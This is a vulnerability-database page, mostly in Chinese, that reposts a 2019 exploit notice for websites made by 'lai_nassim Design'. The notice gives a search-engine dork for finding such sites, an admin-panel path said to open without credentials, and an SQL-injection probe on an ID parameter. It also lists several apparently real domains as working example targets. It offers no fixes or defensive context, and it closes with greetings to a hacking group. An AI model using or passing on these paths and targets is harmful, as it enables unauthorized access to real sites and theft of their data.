lai_nassim Design - Admin Panel Bypass & SQLi - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1576757 漏洞类型
发布时间 2019-04-20 更新时间 2019-04-20
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019040189
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
[+] Title : lai_nassim Algerian Design - Admin Panel Bypass & SQLi
[+] Author [Founder] : ABDO10
[+] Date : April, 20th 2019
[+] Test Was On : Linux , Firefox
[+] Dork : allintext:": lai_nassim@hotmail.fr"

[+] Panel Bypass Poc: 
# [target]/hep/index.php
# No credentials required 

[+] SQli Poc:
[taget]/sejut.php?ID=1%27 

[+] E.g

Bypass 
# akhbarousboue.com/hep/index.php
# http://www.istafid.com/hep/index.php
SQLi 
# http://wassitalkhir.org/wassit-sejut.php?ID=3445%27 
# akhbarousboue.com/s.php?I=1026%27 

GREETZ: ./Lakarha_Family